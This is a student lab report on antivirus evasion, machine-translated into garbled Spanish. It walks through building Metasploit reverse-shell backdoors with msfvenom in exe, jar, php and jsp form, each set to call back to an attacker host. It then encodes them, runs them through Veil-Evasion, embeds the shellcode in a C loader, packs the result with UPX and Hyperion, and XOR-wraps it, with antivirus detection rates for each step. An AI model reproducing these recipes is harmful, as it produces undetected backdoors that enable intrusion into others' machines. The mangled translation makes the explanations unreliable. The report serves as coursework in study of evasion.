2019-2020-2 contra la tecnología de red 20175214 Principios matanza evitar exp3 y Práctica

2019-2020-2 contra la tecnología de red 20175214 Principios matanza evitar exp3 y Práctica

En primer lugar, el conocimiento previo

1. mecanismo de detección de código malicioso

• (1) La detección basada en firmas
  • En el corto período de firma es una o más piezas de datos. Si un archivo ejecutable (o ejecutar otras bibliotecas, guiones, etc.) que contiene dichos datos sean considerados código malicioso.
• (2) heurística de detección de malware
  • "Cuando veo un pájaro que camina como un pato y nada como un pato y grazna como un pato, llamo a ese pájaro un pato." Detección de malware, si un software es por lo general el malware seca hacer las cosas ve como el malware, entonces lo tomaron como un malware ella. El comportamiento típico como la conexión de un sitio malicioso Web, puertos abiertos, modificar los archivos del sistema, el "look and feel" típica como el archivo de la firma en sí, estructurales, los fabricantes y otras informaciones. Cada fabricante definirá su propio modo de detección.
• (3) detección de malware basada en el comportamiento
  • En teoría, la detección basada en el comportamiento es el equivalente de una heurística, o es la inclusión de la vigilancia del comportamiento heurístico.

2. El principio de la libertad de matar (AV)

• (1) cambiar el patrón
  • hay EXE
    • Packers: Compresión cubierta de la cáscara de cifrado
  • Hay código shell (como Meterpreter)
    • Codificados con codificación
    • de carga útil basada en el archivo ejecutable recompilado
  • El código fuente
    • Reescrito en otro idioma y luego compilado (velo-evasión)
• (2) cambios en el comportamiento
  • comunicación
    • Trate de usar una conexión de rebote
    • Usar la tecnología de túnel
    • datos de las comunicaciones cifradas
  • Modo de operación
    • operación basada en RAM
    • Reducir la modificación del sistema de
    • Unirse a confundir el papel de la función normal del código
• (3) métodos no convencionales
  • Mediante una aplicación vulnerable como una puerta trasera, como el código de ataque de escritura en el MSF.
  • Usar el ataque clase social, el objetivo de la truco de software AV.
  • Hechos a mano de un software malicioso

En segundo lugar, el contenido experimental

(1) El uso apropiado codificador msf, msfvenom genera otros archivos, tales como un frasco o similar, velo-evasión, un empacador, el uso de programación shellcode;

• 1, el codificador genera msf exe

  • La detección directa

    • El segundo experimento generó MSF puerta trasera 5214_bd.exede carga VirusTotal resultados del análisis son los siguientes:
      

    • Visible, 71 kill suave 57 se detectaron fuera.

    • resultados de detección VirScan son los siguientes:
      

    • Visto, hay 49 28 Kill detectado suave.

  • 10 veces de codificación

    • msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.177.132 LPORT=5214 -f exe > bd_1.exe
      • parámetros:
        • -b: eliminar un carácter;
        • -e: Seleccione el codificador;
        • -i: el número de veces;
    • Subir, y los resultados son los siguientes, y antes no difieren mucho, no demasiado visibles de codificación efecto sustancial:
      

• MSF 2, el uso de otros formatos de archivo generado

  • tarro generada:msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.177.132 LPORT=5214 x> 5214_bd.jar

    • Subir, y los resultados son los siguientes, el efecto es un poco mejor que exe, hay 35 Kill suave detectado:
      

  • Generar php:msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.177.132 LPORT=5214 -f raw >5214_bd.php

    • Subir, y los resultados son los siguientes, sólo tres detectados:
      

  • JSP generada:msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.177.132 LPORT=5214 R >5214_bd.jsp

    • Subir, y los resultados son los siguientes, sólo cinco detectados:
      

• 3, utilizando la generación velo-evasión y de puerta trasera de detección

  • Creo que este es el paso más problemático, repiten varias veces antes de instalarse con éxito, perdiendo mucho tiempo;

  • Después de la instalación, introduzca primero veilen la interfaz del velo, y luego entrar use evasionen el velo-evasión:
    

  • Entonces configurar la entrada use c/meterpreter/rev_tcp.pyen la interfaz de configuración, principalmente para configurar el IP y el puerto, y como msf, ip ip de la elección es kali;

    • set LHOST 192.168.177.132
    • set LPORT 5214
      

  • Entrada generatearchivos generados, e introduzca el nombre del archivo, la ruta del archivo se muestra en la figura:
    

  • O cargar archivos de detectar que MSF generada exe poco mejor, los resultados son los siguientes:
    

• 4, el uso de la programación de código shell

  • De entrada en la línea de comandos msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.177.132 LPORT=5214 -f cpara generar el código shell;
    

  • c vim un código específico documento como sigue:

unsigned char buf[] = 之前获得的shellcode;
int main()
{
    int (*func)() = (int(*)())buf;
    func();
}

• Para compilar el archivo: i686-w64-mingw32-g++ bd_shellcode.c -o bd_shellcode.exey subir Detección:
  

• 5, un empacador

  • La compresión de la envoltura es un recurso correspondiente, todavía ejecutar después de la compresión. Se puede utilizar para proteger los derechos de autor, pero muchos virus también lo utilizan como un principio.

  • 1, la carcasa de compresión (el UPX)

    • Introduzca upx bd_shellcode.exe -o bd_shellcode_upx.exeempacadores
      

    • Subir de detección:
      

  • 2, cáscara de cifrado (Hyperion)
    debido a clon directo velo antes de la instalación, de modo que el camino no se puede encontrar en el Hyperion correspondiente, una re instalado Hyperion, un procedimiento detallado, ver el blog ;

    • La generado previamente bd_shellcode_upx.execopia en la carpeta de Hyperion, y ejecutar el siguiente comando:

      • wine hyperion.exe -v bd_shellcode_upx.exe bd_shellcode_upx_Hyperion.exe
        

    • Convención, además de una prueba de doble casco de exe sitio de carga:
      

    • Entonces sorprendió al descubrir que se detecte una doble carcasa en comparación con el número de casco único aumentado realmente ......

• 6, otra clase no describe el método

  • Necesidad de utilizar una herramienta ShellcodeWrapper

  • Generar un primer formato en bruto con msfvenom código shell

    • msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' LHOST=192.168.177.132 LPORT=5214 -f raw > shellcode.raw

  • A continuación, vaya a la carpeta de descarga ShellcodeWrapper ejecutar el siguiente comando, que es una clave tidesec la configuración propia.

    • python shellcode_encoder.py -cpp -cs -py shellcode.raw tidesec xor
      

  • La generación de los tres archivos son C ++ código fuente, archivos de código fuente C # y PY;

  • El C ++ código fuente en bloque de código compilado exe
    

  • Prueba de conexión
    

  • detección de sitios de subida
    

(2) implementada por el código malicioso en combinación para matar a una variedad de técnicas de Free

• ideas específicas: código shell genera un formato RAW msfvenom usado, el uso de código shell ShellcodeWrapper xor ser encriptada, C ++ para generar código fuente compilado exe
• Detección de captura de pantalla 360 como sigue:
  

(3) Medido con otro equipo, en el caso de matanza suave en, y correr de nuevo a tener éxito, incluso, matar a la versión suave marcado con el nombre del equipo

• Usando win7 máquina virtual;
• Resultados de operación y matar a la versión blanda es la siguiente:
  

En tercer lugar, las preguntas contestadas básicos

Cómo (1) suave matanza se detecta código malicioso?

• detección basada en firmas: Si un archivo ejecutable (o ejecutar otras bibliotecas, guiones, etc.) que contiene los datos se marca característica se considera código malicioso.
• heurística de detección de malware: Si un software de malware por lo general se seca do, se ve como el malware, que será tratado como el software malicioso
• detección de malware basado en el comportamiento: una heurística es equivalente a, o se unió a la vigilancia del comportamiento heurístico.

(2) es libre de matar qué hacer?

• Para que el código malicioso puede escapar de la matanza suave matar

(3) métodos básicos para evitar matar qué?

• Una firma diferente: packer para las operaciones de archivo EXE, o para codificar o carga útil shellcode está codificado con basado vuelve a compilar archivo ejecutable,
• Cambio de comportamiento: Utilice una conexión de rebote, un túnel de datos y la comunicación cifrada. Mientras que la adición de la función normal del código, para minimizar los cambios en el sistema.
• Mediante una aplicación vulnerable como una puerta trasera, como el código de ataque de escritura en el MSF.
• Usar el ataque clase social, el objetivo de la truco de software AV.
• Hechos a mano de un software malicioso

(4) matanza suave abierta puede impedir absolutamente código informático malicioso?

• No, suave matanza en curso, la tecnología de código malicioso también continúa con el cambio, podemos hacer es desarrollar buenos hábitos en línea, y la actualización de la base de datos de virus matanza suave en cualquier momento, para garantizar el funcionamiento normal de la matanza suave.

En cuarto lugar, sentimientos y experiencias

  Quedarse hasta tarde volvió a superar los límites qaq, una muy tarde en un canto relación (cinco de la tarde ......), este experimento la mayor parte del tiempo de carga velo y la auto-realización evitar la matanza, es sobre todo estoy más cabeza de hierro el método se ha aplicado antes de que los estudiantes no quieren usar, que alcanzó un montón de paredes, sino también pensado en renunciar varias veces durante el cambio a una forma ya hecha, pero pegado con ella y ser capaz de implementar con éxito me hace larga Shu, finalmente, tono.
  El experimento me enseñó los principios básicos para matar y evitar operaciones básicas, ver matanza suave no es una panacea, sino también comprender la importancia de la seguridad del sistema, a través del acceso a la información, sino también ejercer mi capacidad de auto-aprendizaje, una gran cosecha.